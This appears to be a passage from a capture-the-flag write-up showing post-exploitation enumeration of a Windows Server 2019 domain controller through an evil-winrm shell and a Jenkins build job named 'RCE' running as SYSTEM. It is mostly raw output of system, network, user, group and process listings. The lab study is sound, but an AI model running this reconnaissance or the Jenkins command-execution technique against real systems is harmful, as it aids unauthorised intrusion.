System/Kernel
*evil-winrm* ps c:\Users\oliver\Documents> systeminfo ; Get-ComputerInfo
program 'systeminfo.exe' failed to run: Access is deniedAt line:1 char:1
+ systeminfo ; Get-ComputerInfo
+ ~~~~~~~~~~.
at line:1 char:1
+ systeminfo ; Get-ComputerInfo
+ ~~~~~~~~~~
+ categoryinfo : ResourceUnavailable: (:) [], ApplicationFailedException
+ fullyqualifiederrorid : NativeCommandFailed
windowsbuildlabex : 17763.1.amd64fre.rs5_release.180914-1434
windowscurrentversion : 6.3
windowseditionid : ServerStandard
windowsinstallationtype : Server
windowsinstalldatefromregistry : 4/10/2020 5:48:06 PM
windowsproductid : 00429-00521-62775-AA439
windowsproductname : Windows Server 2019 Standard
windowsregisteredorganization :
windowsregisteredowner : Windows User
windowssystemroot : C:\Windows
windowsversion : 1809
osserverlevel : FullServer
keyboardlayout :
timezone : (UTC-08:00) Pacific Time (US & Canada)
logonserver :
powerplatformrole : Desktop
deviceguardsmartstatus : OffWindows Server 2019 Standard
17763.1.amd64fre.rs5_release.180914-1434
I get a Access is Denied error for executing systeminfo.exe However, I get a different result when executing systeminfo.exe from the Jenkins Build process below
System/Kernel (Jenkins Security Context)
Started by remote host 10.10.16.5
Running as SYSTEM
Building in workspace C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\RCE
[RCE] $ cmd /c call C:\Users\oliver\AppData\Local\Temp\jenkins16685956896460781573.bat
C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\RCE>systeminfo
Host Name: JENKINS
OS Name: Microsoft Windows Server 2019 Standard
OS Version: 10.0.17763 N/A Build 17763
OS Manufacturer: Microsoft Corporation
OS Configuration: Primary Domain Controller
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00429-00521-62775-AA439
Original Install Date: 4/10/2020, 9:48:06 AM
System Boot Time: 9/20/2023, 1:54:07 AM
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
BIOS Version: VMware, Inc. VMW71.00V.16707776.B64.2008070230, 8/7/2020
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume3
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory: 6,143 MB
Available Physical Memory: 4,170 MB
Virtual Memory: Max Size: 7,167 MB
Virtual Memory: Available: 5,195 MB
Virtual Memory: In Use: 1,972 MB
Page File Location(s): C:\pagefile.sys
Domain: object.local
Logon Server: N/A
Hotfix(s): 7 Hotfix(s) Installed.
[01]: KB5004335
[02]: KB4535680
[03]: KB4539571
[04]: KB4570332
[05]: KB4589208
[06]: KB5005112
[07]: KB5005030
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0
DHCP Enabled: No
IP address(es)
[01]: 10.10.11.132
[02]: fe80::f00b:8831:17ef:6c30
[03]: dead:beef::f00b:8831:17ef:6c30
[04]: dead:beef::20c
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.I am able to execute systeminfo.exe as the oliver user through the Jenkins Build process
This strange behavior is due to the security context configured for Jenkins
Microsoft Windows Server 2019 Standard
10.0.17763 N/A Build 17763
x64-based
7 Hotfix(s)
Networks
*evil-winrm* ps c:\Users\oliver\Documents> ipconfig /all ; arp -a
Windows IP Configuration
host name . . . . . . . . . . . . : jenkins
primary dns suffix . . . . . . . : object.local
node type . . . . . . . . . . . . : Hybrid
ip routing enabled. . . . . . . . : No
wins proxy enabled. . . . . . . . : No
dns suffix search list. . . . . . : object.local
htb
ethernet adapter ethernet0:
connection-specific dns suffix . : htb
description . . . . . . . . . . . : vmxnet3 Ethernet Adapter
physical address. . . . . . . . . : 00-50-56-B9-8B-01
dhcp enabled. . . . . . . . . . . : No
autoconfiguration enabled . . . . : Yes
ipv6 address. . . . . . . . . . . : dead:beef::20c(Preferred)
lease obtained. . . . . . . . . . : Wednesday, September 20, 2023 1:54:28 AM
lease expires . . . . . . . . . . : Wednesday, September 20, 2023 6:24:27 AM
ipv6 address. . . . . . . . . . . : dead:beef::f00b:8831:17ef:6c30(Preferred)
link-local ipv6 address . . . . . : fe80::f00b:8831:17ef:6c30%12(Preferred)
ipv4 address. . . . . . . . . . . : 10.10.11.132(Preferred)
subnet mask . . . . . . . . . . . : 255.255.255.0
default gateway . . . . . . . . . : fe80::250:56ff:feb9:d784%12
10.10.10.2
dhcpv6 iaid . . . . . . . . . . . : 100683862
dhcpv6 client duid. . . . . . . . : 00-01-00-01-2C-9C-6B-96-00-50-56-B9-8B-01
dns servers . . . . . . . . . . . : ::1
127.0.0.1
netbios over tcpip. . . . . . . . : Enabled
connection-specific dns suffix search list :
htb
interface: 10.10.11.132 --- 0xc
Internet Address Physical Address Type
10.10.10.2 00-50-56-b9-d7-84 dynamic
10.10.11.255 ff-ff-ff-ff-ff-ff static
224.0.0.22 01-00-5e-00-00-16 static
224.0.0.251 01-00-5e-00-00-fb static
224.0.0.252 01-00-5e-00-00-fc static
*evil-winrm* ps c:\Users\oliver\Documents> netstat -ano | Select-String LIST
tcp 0.0.0.0:80 0.0.0.0:0 LISTENING 4
tcp 0.0.0.0:88 0.0.0.0:0 LISTENING 640
tcp 0.0.0.0:135 0.0.0.0:0 LISTENING 900
tcp 0.0.0.0:389 0.0.0.0:0 LISTENING 640
tcp 0.0.0.0:445 0.0.0.0:0 LISTENING 4
tcp 0.0.0.0:464 0.0.0.0:0 LISTENING 640
tcp 0.0.0.0:593 0.0.0.0:0 LISTENING 900
tcp 0.0.0.0:636 0.0.0.0:0 LISTENING 640
tcp 0.0.0.0:3268 0.0.0.0:0 LISTENING 640
tcp 0.0.0.0:3269 0.0.0.0:0 LISTENING 640
tcp 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
tcp 0.0.0.0:8080 0.0.0.0:0 LISTENING 5380
tcp 0.0.0.0:9389 0.0.0.0:0 LISTENING 2720
tcp 0.0.0.0:47001 0.0.0.0:0 LISTENING 4
tcp 0.0.0.0:49664 0.0.0.0:0 LISTENING 480
tcp 0.0.0.0:49665 0.0.0.0:0 LISTENING 1148
tcp 0.0.0.0:49666 0.0.0.0:0 LISTENING 1564
tcp 0.0.0.0:49667 0.0.0.0:0 LISTENING 640
tcp 0.0.0.0:49673 0.0.0.0:0 LISTENING 640
tcp 0.0.0.0:49674 0.0.0.0:0 LISTENING 640
tcp 0.0.0.0:49678 0.0.0.0:0 LISTENING 620
tcp 0.0.0.0:49694 0.0.0.0:0 LISTENING 3040
tcp 0.0.0.0:52575 0.0.0.0:0 LISTENING 2220
tcp 10.10.11.132:53 0.0.0.0:0 LISTENING 3040
tcp 10.10.11.132:139 0.0.0.0:0 LISTENING 4
tcp 127.0.0.1:53 0.0.0.0:0 LISTENING 3040
tcp [::]:80 [::]:0 LISTENING 4
tcp [::]:88 [::]:0 LISTENING 640
tcp [::]:135 [::]:0 LISTENING 900
tcp [::]:389 [::]:0 LISTENING 640
tcp [::]:445 [::]:0 LISTENING 4
tcp [::]:464 [::]:0 LISTENING 640
tcp [::]:593 [::]:0 LISTENING 900
tcp [::]:636 [::]:0 LISTENING 640
tcp [::]:3268 [::]:0 LISTENING 640
tcp [::]:3269 [::]:0 LISTENING 640
tcp [::]:5985 [::]:0 LISTENING 4
tcp [::]:8080 [::]:0 LISTENING 5380
tcp [::]:9389 [::]:0 LISTENING 2720
tcp [::]:47001 [::]:0 LISTENING 4
tcp [::]:49664 [::]:0 LISTENING 480
tcp [::]:49665 [::]:0 LISTENING 1148
tcp [::]:49666 [::]:0 LISTENING 1564
tcp [::]:49667 [::]:0 LISTENING 640
tcp [::]:49673 [::]:0 LISTENING 640
tcp [::]:49674 [::]:0 LISTENING 640
tcp [::]:49678 [::]:0 LISTENING 620
tcp [::]:49694 [::]:0 LISTENING 3040
tcp [::]:52575 [::]:0 LISTENING 2220
tcp [::1]:53 [::]:0 LISTENING 3040
tcp [dead:beef::20c]:53 [::]:0 LISTENING 3040
tcp [dead:beef::f00b:8831:17ef:6c30]:53 [::]:0 LISTENING 3040
tcp [fe80::f00b:8831:17ef:6c30%12]:53 [::]:0 LISTENING 3040object.local
dead:beef::20c
dead:beef::f00b:8831:17ef:6c30
0.0.0.0:88
0.0.0.0:135
0.0.0.0:389
0.0.0.0:445
0.0.0.0:464
0.0.0.0:593
0.0.0.0:636
0.0.0.0:3268
0.0.0.0:3269
0.0.0.0:9389
10.10.11.132:139
Networks (Jenkins Security Context)
Started by remote host 10.10.16.5
Running as SYSTEM
Building in workspace C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\RCE
[RCE] $ cmd /c call C:\Users\oliver\AppData\Local\Temp\jenkins10944981864935138310.bat
C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\RCE>ipconfig /all && arp -a && netstat -ano
Windows IP Configuration
Host Name . . . . . . . . . . . . : jenkins
Primary Dns Suffix . . . . . . . : object.local
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : object.local
htb
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : htb
Description . . . . . . . . . . . : vmxnet3 Ethernet Adapter
Physical Address. . . . . . . . . : 00-50-56-B9-8B-01
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
IPv6 Address. . . . . . . . . . . : dead:beef::20c(Preferred)
Lease Obtained. . . . . . . . . . : Wednesday, September 20, 2023 1:54:28 AM
Lease Expires . . . . . . . . . . : Wednesday, September 20, 2023 6:24:27 AM
IPv6 Address. . . . . . . . . . . : dead:beef::f00b:8831:17ef:6c30(Preferred)
Link-local IPv6 Address . . . . . : fe80::f00b:8831:17ef:6c30%12(Preferred)
IPv4 Address. . . . . . . . . . . : 10.10.11.132(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:d784%12
10.10.10.2
DHCPv6 IAID . . . . . . . . . . . : 100683862
DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-2C-9C-6B-96-00-50-56-B9-8B-01
DNS Servers . . . . . . . . . . . : ::1
127.0.0.1
NetBIOS over Tcpip. . . . . . . . : Enabled
Connection-specific DNS Suffix Search List :
htb
Interface: 10.10.11.132 --- 0xc
Internet Address Physical Address Type
10.10.10.2 00-50-56-b9-d7-84 dynamic
10.10.11.255 ff-ff-ff-ff-ff-ff static
224.0.0.22 01-00-5e-00-00-16 static
224.0.0.251 01-00-5e-00-00-fb static
224.0.0.252 01-00-5e-00-00-fc static
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:88 0.0.0.0:0 LISTENING 640
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 900
TCP 0.0.0.0:389 0.0.0.0:0 LISTENING 640
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:464 0.0.0.0:0 LISTENING 640
TCP 0.0.0.0:593 0.0.0.0:0 LISTENING 900
TCP 0.0.0.0:636 0.0.0.0:0 LISTENING 640
TCP 0.0.0.0:3268 0.0.0.0:0 LISTENING 640
TCP 0.0.0.0:3269 0.0.0.0:0 LISTENING 640
TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:8080 0.0.0.0:0 LISTENING 5380
TCP 0.0.0.0:9389 0.0.0.0:0 LISTENING 2720
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 480
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 1148
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 1564
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 640
TCP 0.0.0.0:49673 0.0.0.0:0 LISTENING 640
TCP 0.0.0.0:49674 0.0.0.0:0 LISTENING 640
TCP 0.0.0.0:49678 0.0.0.0:0 LISTENING 620
TCP 0.0.0.0:49694 0.0.0.0:0 LISTENING 3040
TCP 0.0.0.0:52575 0.0.0.0:0 LISTENING 2220
TCP 10.10.11.132:53 0.0.0.0:0 LISTENING 3040
TCP 10.10.11.132:139 0.0.0.0:0 LISTENING 4
TCP 10.10.11.132:5985 10.10.16.5:36192 TIME_WAIT 0
TCP 10.10.11.132:5985 10.10.16.5:36194 ESTABLISHED 4
TCP 10.10.11.132:5985 10.10.16.5:56672 TIME_WAIT 0
TCP 10.10.11.132:5985 10.10.16.5:56698 TIME_WAIT 0
TCP 10.10.11.132:5985 10.10.16.5:58162 TIME_WAIT 0
TCP 10.10.11.132:8080 10.10.16.5:34150 TIME_WAIT 0
TCP 10.10.11.132:8080 10.10.16.5:34156 TIME_WAIT 0
TCP 10.10.11.132:8080 10.10.16.5:39744 TIME_WAIT 0
TCP 10.10.11.132:8080 10.10.16.5:39752 TIME_WAIT 0
TCP 10.10.11.132:8080 10.10.16.5:39762 TIME_WAIT 0
TCP 10.10.11.132:8080 10.10.16.5:39778 TIME_WAIT 0
TCP 10.10.11.132:8080 10.10.16.5:39790 TIME_WAIT 0
TCP 10.10.11.132:8080 10.10.16.5:39798 TIME_WAIT 0
TCP 10.10.11.132:8080 10.10.16.5:39808 TIME_WAIT 0
TCP 10.10.11.132:8080 10.10.16.5:39824 TIME_WAIT 0
TCP 10.10.11.132:8080 10.10.16.5:39834 TIME_WAIT 0
TCP 10.10.11.132:8080 10.10.16.5:39836 TIME_WAIT 0
TCP 10.10.11.132:8080 10.10.16.5:43052 TIME_WAIT 0
TCP 10.10.11.132:8080 10.10.16.5:43056 TIME_WAIT 0
TCP 10.10.11.132:8080 10.10.16.5:53398 TIME_WAIT 0
TCP 10.10.11.132:8080 10.10.16.5:53412 TIME_WAIT 0
TCP 10.10.11.132:8080 10.10.16.5:53414 TIME_WAIT 0
TCP 10.10.11.132:8080 10.10.16.5:53418 TIME_WAIT 0
TCP 10.10.11.132:8080 10.10.16.5:53420 TIME_WAIT 0
TCP 10.10.11.132:8080 10.10.16.5:53426 TIME_WAIT 0
TCP 10.10.11.132:8080 10.10.16.5:53428 TIME_WAIT 0
TCP 10.10.11.132:8080 10.10.16.5:53432 TIME_WAIT 0
TCP 10.10.11.132:8080 10.10.16.5:53434 TIME_WAIT 0
TCP 10.10.11.132:8080 10.10.16.5:53442 TIME_WAIT 0
TCP 10.10.11.132:8080 10.10.16.5:53446 TIME_WAIT 0
TCP 10.10.11.132:8080 10.10.16.5:53454 TIME_WAIT 0
TCP 10.10.11.132:8080 10.10.16.5:53456 TIME_WAIT 0
TCP 10.10.11.132:8080 10.10.16.5:53462 TIME_WAIT 0
TCP 10.10.11.132:8080 10.10.16.5:53476 TIME_WAIT 0
TCP 10.10.11.132:8080 10.10.16.5:53480 TIME_WAIT 0
TCP 127.0.0.1:53 0.0.0.0:0 LISTENING 3040
TCP 127.0.0.1:52392 127.0.0.1:52393 ESTABLISHED 5380
TCP 127.0.0.1:52393 127.0.0.1:52392 ESTABLISHED 5380
TCP [::]:80 [::]:0 LISTENING 4
TCP [::]:88 [::]:0 LISTENING 640
TCP [::]:135 [::]:0 LISTENING 900
TCP [::]:389 [::]:0 LISTENING 640
TCP [::]:445 [::]:0 LISTENING 4
TCP [::]:464 [::]:0 LISTENING 640
TCP [::]:593 [::]:0 LISTENING 900
TCP [::]:636 [::]:0 LISTENING 640
TCP [::]:3268 [::]:0 LISTENING 640
TCP [::]:3269 [::]:0 LISTENING 640
TCP [::]:5985 [::]:0 LISTENING 4
TCP [::]:8080 [::]:0 LISTENING 5380
TCP [::]:9389 [::]:0 LISTENING 2720
TCP [::]:47001 [::]:0 LISTENING 4
TCP [::]:49664 [::]:0 LISTENING 480
TCP [::]:49665 [::]:0 LISTENING 1148
TCP [::]:49666 [::]:0 LISTENING 1564
TCP [::]:49667 [::]:0 LISTENING 640
TCP [::]:49673 [::]:0 LISTENING 640
TCP [::]:49674 [::]:0 LISTENING 640
TCP [::]:49678 [::]:0 LISTENING 620
TCP [::]:49694 [::]:0 LISTENING 3040
TCP [::]:52575 [::]:0 LISTENING 2220
TCP [::1]:53 [::]:0 LISTENING 3040
TCP [::1]:389 [::1]:49676 ESTABLISHED 640
TCP [::1]:389 [::1]:49677 ESTABLISHED 640
TCP [::1]:389 [::1]:49692 ESTABLISHED 640
TCP [::1]:389 [::1]:49693 ESTABLISHED 640
TCP [::1]:389 [::1]:52401 ESTABLISHED 640
TCP [::1]:389 [::1]:52402 ESTABLISHED 640
TCP [::1]:389 [::1]:52403 ESTABLISHED 640
TCP [::1]:49676 [::1]:389 ESTABLISHED 3000
TCP [::1]:49677 [::1]:389 ESTABLISHED 3000
TCP [::1]:49692 [::1]:389 ESTABLISHED 3040
TCP [::1]:49693 [::1]:389 ESTABLISHED 3040
TCP [::1]:52401 [::1]:389 ESTABLISHED 2720
TCP [::1]:52402 [::1]:389 ESTABLISHED 2720
TCP [::1]:52403 [::1]:389 ESTABLISHED 2720
TCP [dead:beef::20c]:53 [::]:0 LISTENING 3040
TCP [dead:beef::f00b:8831:17ef:6c30]:53 [::]:0 LISTENING 3040
TCP [fe80::f00b:8831:17ef:6c30%12]:53 [::]:0 LISTENING 3040
TCP [fe80::f00b:8831:17ef:6c30%12]:389 [fe80::f00b:8831:17ef:6c30%12]:52568 ESTABLISHED 640
TCP [fe80::f00b:8831:17ef:6c30%12]:389 [fe80::f00b:8831:17ef:6c30%12]:52573 ESTABLISHED 640
TCP [fe80::f00b:8831:17ef:6c30%12]:9389 [fe80::f00b:8831:17ef:6c30%12]:49838 ESTABLISHED 2720
TCP [fe80::f00b:8831:17ef:6c30%12]:9389 [fe80::f00b:8831:17ef:6c30%12]:49839 ESTABLISHED 2720
TCP [fe80::f00b:8831:17ef:6c30%12]:49667 [fe80::f00b:8831:17ef:6c30%12]:52570 ESTABLISHED 640
TCP [fe80::f00b:8831:17ef:6c30%12]:49667 [fe80::f00b:8831:17ef:6c30%12]:53030 ESTABLISHED 640
TCP [fe80::f00b:8831:17ef:6c30%12]:49738 [fe80::f00b:8831:17ef:6c30%12]:135 TIME_WAIT 0
TCP [fe80::f00b:8831:17ef:6c30%12]:49744 [fe80::f00b:8831:17ef:6c30%12]:9389 TIME_WAIT 0
TCP [fe80::f00b:8831:17ef:6c30%12]:49747 [fe80::f00b:8831:17ef:6c30%12]:9389 TIME_WAIT 0
TCP [fe80::f00b:8831:17ef:6c30%12]:49750 [fe80::f00b:8831:17ef:6c30%12]:9389 TIME_WAIT 0
TCP [fe80::f00b:8831:17ef:6c30%12]:49753 [fe80::f00b:8831:17ef:6c30%12]:9389 TIME_WAIT 0
TCP [fe80::f00b:8831:17ef:6c30%12]:49759 [fe80::f00b:8831:17ef:6c30%12]:9389 TIME_WAIT 0
TCP [fe80::f00b:8831:17ef:6c30%12]:49762 [fe80::f00b:8831:17ef:6c30%12]:9389 TIME_WAIT 0
TCP [fe80::f00b:8831:17ef:6c30%12]:49765 [fe80::f00b:8831:17ef:6c30%12]:9389 TIME_WAIT 0
TCP [fe80::f00b:8831:17ef:6c30%12]:49768 [fe80::f00b:8831:17ef:6c30%12]:9389 TIME_WAIT 0
TCP [fe80::f00b:8831:17ef:6c30%12]:49772 [fe80::f00b:8831:17ef:6c30%12]:9389 TIME_WAIT 0
TCP [fe80::f00b:8831:17ef:6c30%12]:49775 [fe80::f00b:8831:17ef:6c30%12]:9389 TIME_WAIT 0
TCP [fe80::f00b:8831:17ef:6c30%12]:49779 [fe80::f00b:8831:17ef:6c30%12]:9389 TIME_WAIT 0
TCP [fe80::f00b:8831:17ef:6c30%12]:49782 [fe80::f00b:8831:17ef:6c30%12]:9389 TIME_WAIT 0
TCP [fe80::f00b:8831:17ef:6c30%12]:49785 [fe80::f00b:8831:17ef:6c30%12]:9389 TIME_WAIT 0
TCP [fe80::f00b:8831:17ef:6c30%12]:49788 [fe80::f00b:8831:17ef:6c30%12]:9389 TIME_WAIT 0
TCP [fe80::f00b:8831:17ef:6c30%12]:49791 [fe80::f00b:8831:17ef:6c30%12]:9389 TIME_WAIT 0
TCP [fe80::f00b:8831:17ef:6c30%12]:49794 [fe80::f00b:8831:17ef:6c30%12]:9389 TIME_WAIT 0
TCP [fe80::f00b:8831:17ef:6c30%12]:49797 [fe80::f00b:8831:17ef:6c30%12]:9389 TIME_WAIT 0
TCP [fe80::f00b:8831:17ef:6c30%12]:49800 [fe80::f00b:8831:17ef:6c30%12]:9389 TIME_WAIT 0
TCP [fe80::f00b:8831:17ef:6c30%12]:49803 [fe80::f00b:8831:17ef:6c30%12]:9389 TIME_WAIT 0
TCP [fe80::f00b:8831:17ef:6c30%12]:49806 [fe80::f00b:8831:17ef:6c30%12]:9389 TIME_WAIT 0
TCP [fe80::f00b:8831:17ef:6c30%12]:49809 [fe80::f00b:8831:17ef:6c30%12]:9389 TIME_WAIT 0
TCP [fe80::f00b:8831:17ef:6c30%12]:49812 [fe80::f00b:8831:17ef:6c30%12]:9389 TIME_WAIT 0
TCP [fe80::f00b:8831:17ef:6c30%12]:49815 [fe80::f00b:8831:17ef:6c30%12]:9389 TIME_WAIT 0
TCP [fe80::f00b:8831:17ef:6c30%12]:49818 [fe80::f00b:8831:17ef:6c30%12]:9389 TIME_WAIT 0
TCP [fe80::f00b:8831:17ef:6c30%12]:49822 [fe80::f00b:8831:17ef:6c30%12]:9389 TIME_WAIT 0
TCP [fe80::f00b:8831:17ef:6c30%12]:49825 [fe80::f00b:8831:17ef:6c30%12]:9389 TIME_WAIT 0
TCP [fe80::f00b:8831:17ef:6c30%12]:49828 [fe80::f00b:8831:17ef:6c30%12]:9389 TIME_WAIT 0
TCP [fe80::f00b:8831:17ef:6c30%12]:49831 [fe80::f00b:8831:17ef:6c30%12]:9389 TIME_WAIT 0
TCP [fe80::f00b:8831:17ef:6c30%12]:49834 [fe80::f00b:8831:17ef:6c30%12]:9389 TIME_WAIT 0
TCP [fe80::f00b:8831:17ef:6c30%12]:49837 [fe80::f00b:8831:17ef:6c30%12]:9389 TIME_WAIT 0
TCP [fe80::f00b:8831:17ef:6c30%12]:49838 [fe80::f00b:8831:17ef:6c30%12]:9389 ESTABLISHED 3076
TCP [fe80::f00b:8831:17ef:6c30%12]:49839 [fe80::f00b:8831:17ef:6c30%12]:9389 ESTABLISHED 3076
TCP [fe80::f00b:8831:17ef:6c30%12]:52568 [fe80::f00b:8831:17ef:6c30%12]:389 ESTABLISHED 2220
TCP [fe80::f00b:8831:17ef:6c30%12]:52570 [fe80::f00b:8831:17ef:6c30%12]:49667 ESTABLISHED 2220
TCP [fe80::f00b:8831:17ef:6c30%12]:52573 [fe80::f00b:8831:17ef:6c30%12]:389 ESTABLISHED 2220
TCP [fe80::f00b:8831:17ef:6c30%12]:53030 [fe80::f00b:8831:17ef:6c30%12]:49667 ESTABLISHED 640
UDP 0.0.0.0:123 *:* 328
UDP 0.0.0.0:389 *:* 640
UDP 0.0.0.0:5353 *:* 1068
UDP 0.0.0.0:5355 *:* 1068
UDP 0.0.0.0:57332 *:* 3040
UDP [dead:beef::20c]:53 *:* 3040
UDP [dead:beef::20c]:88 *:* 640
UDP [dead:beef::20c]:464 *:* 640
UDP [dead:beef::f00b:8831:17ef:6c30]:53 *:* 3040
UDP [dead:beef::f00b:8831:17ef:6c30]:88 *:* 640
UDP [dead:beef::f00b:8831:17ef:6c30]:464 *:* 640
UDP [fe80::f00b:8831:17ef:6c30%12]:53 *:* 3040
UDP [fe80::f00b:8831:17ef:6c30%12]:88 *:* 640
UDP [fe80::f00b:8831:17ef:6c30%12]:464 *:* 640Users & Groups
*evil-winrm* ps c:\Users\oliver\Documents> net user ; dir C:\Users
User accounts for \\
-------------------------------------------------------------------------------
Administrator Guest krbtgt
maria oliver
The command completed with one or more errors.
directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 11/10/2021 3:20 AM Administrator
d----- 10/26/2021 7:59 AM maria
d----- 10/26/2021 7:58 AM oliver
d-r--- 4/10/2020 10:49 AM Public
d----- 10/21/2021 3:44 AM smithmaria
smith
*evil-winrm* ps c:\Users\oliver\Documents> net localgroup ; net groups
Aliases for \\JENKINS
-------------------------------------------------------------------------------
*Access Control Assistance Operators
*Account Operators
*Administrators
*Allowed RODC Password Replication Group
*Backup Operators
*Cert Publishers
*Certificate Service DCOM Access
*Cryptographic Operators
*Denied RODC Password Replication Group
*Distributed COM Users
*DnsAdmins
*Event Log Readers
*Guests
*Hyper-V Administrators
*IIS_IUSRS
*Incoming Forest Trust Builders
*Network Configuration Operators
*Performance Log Users
*Performance Monitor Users
*Pre-Windows 2000 Compatible Access
*Print Operators
*RAS and IAS Servers
*RDS Endpoint Servers
*RDS Management Servers
*RDS Remote Access Servers
*Remote Desktop Users
*Remote Management Users
*Replicator
*Server Operators
*Storage Replica Administrators
*Terminal Server License Servers
*Users
*Windows Authorization Access Group
The command completed successfully.
Group Accounts for \\
-------------------------------------------------------------------------------
*Cloneable Domain Controllers
*DnsUpdateProxy
*Domain Admins
*Domain Computers
*Domain Controllers
*Domain Guests
*Domain Users
*Enterprise Admins
*Enterprise Key Admins
*Enterprise Read-only Domain Controllers
*Group Policy Creator Owners
*Key Admins
*Protected Users
*Read-only Domain Controllers
*Schema Admins
The command completed with one or more errors.Users & Groups (Jenkins Security Context)
Started by remote host 10.10.16.5
Running as SYSTEM
Building in workspace C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\RCE
[RCE] $ cmd /c call C:\Users\oliver\AppData\Local\Temp\jenkins11447908940462272705.bat
C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\RCE>net user && dir C:\Users
User accounts for \\JENKINS
-------------------------------------------------------------------------------
Administrator Guest krbtgt
maria oliver
The command completed successfully.
Volume in drive C has no label.
Volume Serial Number is 212C-60B7
Directory of C:\Users
10/22/2021 03:54 AM <DIR> .
10/22/2021 03:54 AM <DIR> ..
11/10/2021 04:20 AM <DIR> Administrator
10/26/2021 07:59 AM <DIR> maria
10/26/2021 07:58 AM <DIR> oliver
04/10/2020 10:49 AM <DIR> Public
10/21/2021 03:44 AM <DIR> smith
0 File(s) 0 bytes
7 Dir(s) 4,626,157,568 bytes freeStarted by remote host 10.10.16.5
Running as SYSTEM
Building in workspace C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\RCE
[RCE] $ cmd /c call C:\Users\oliver\AppData\Local\Temp\jenkins12824676455424211834.bat
C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\RCE>net localgroup && net groups
Aliases for \\JENKINS
-------------------------------------------------------------------------------
*Access Control Assistance Operators
*Account Operators
*Administrators
*Allowed RODC Password Replication Group
*Backup Operators
*Cert Publishers
*Certificate Service DCOM Access
*Cryptographic Operators
*Denied RODC Password Replication Group
*Distributed COM Users
*DnsAdmins
*Event Log Readers
*Guests
*Hyper-V Administrators
*IIS_IUSRS
*Incoming Forest Trust Builders
*Network Configuration Operators
*Performance Log Users
*Performance Monitor Users
*Pre-Windows 2000 Compatible Access
*Print Operators
*RAS and IAS Servers
*RDS Endpoint Servers
*RDS Management Servers
*RDS Remote Access Servers
*Remote Desktop Users
*Remote Management Users
*Replicator
*Server Operators
*Storage Replica Administrators
*Terminal Server License Servers
*Users
*Windows Authorization Access Group
The command completed successfully.
Group Accounts for \\JENKINS
-------------------------------------------------------------------------------
*Cloneable Domain Controllers
*DnsUpdateProxy
*Domain Admins
*Domain Computers
*Domain Controllers
*Domain Guests
*Domain Users
*Enterprise Admins
*Enterprise Key Admins
*Enterprise Read-only Domain Controllers
*Group Policy Creator Owners
*Key Admins
*Protected Users
*Read-only Domain Controllers
*Schema Admins
The command completed successfully.Processes
*evil-winrm* ps c:\Users\oliver\Documents> ps
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
78 5 3448 1964 492 0 cmd
78 5 2460 1452 2328 0 cmd
151 9 7896 6888 68 0 conhost
151 9 7388 6212 1356 0 conhost
150 9 6628 12472 0.05 5056 0 conhost
150 9 6648 12476 0.27 5436 0 conhost
502 20 2236 5440 372 0 csrss
279 16 2248 5172 488 1 csrss
362 15 3504 14912 4412 1 ctfmon
399 33 16604 23632 2220 0 dfsrs
157 9 2048 6144 3108 0 dfssvc
258 14 3904 13472 3708 0 dllhost
10384 7409 131500 129240 3040 0 dns
584 26 26216 55964 244 1 dwm
1400 54 20932 9320 5148 1 explorer
49 6 1508 4108 2696 0 fontdrvhost
49 6 1776 4836 2704 1 fontdrvhost
0 0 56 8 0 0 Idle
131 12 1972 5624 3000 0 ismserv
954 35 573424 540784 261.39 5380 0 java
259 15 18316 20928 5816 0 jenkins
459 25 18324 41692 3448 1 LogonUI
1842 165 75432 69028 640 0 lsass
479 36 54492 66336 2720 0 Microsoft.ActiveDirectory.WebServices
225 13 3104 10368 4008 0 msdtc
69 6 868 3248 3272 0 PING
69 5 828 3256 4332 0 PING
0 13 456 18800 88 0 Registry
276 14 3076 15372 5280 1 RuntimeBroker
147 8 1608 7780 5924 1 RuntimeBroker
339 19 10692 24472 6032 1 RuntimeBroker
676 33 20132 64536 5848 1 SearchUI
740 36 105272 44212 5772 1 ServerManager
621 14 5676 13544 620 0 services
705 29 15160 52528 5724 1 ShellExperienceHost
444 17 4760 24612 2336 1 sihost
53 3 500 1212 288 0 smss
127 15 3788 7968 308 0 svchost
206 12 1644 7304 328 0 svchost
172 9 1552 7468 476 0 svchost
205 11 2620 11860 560 0 svchost
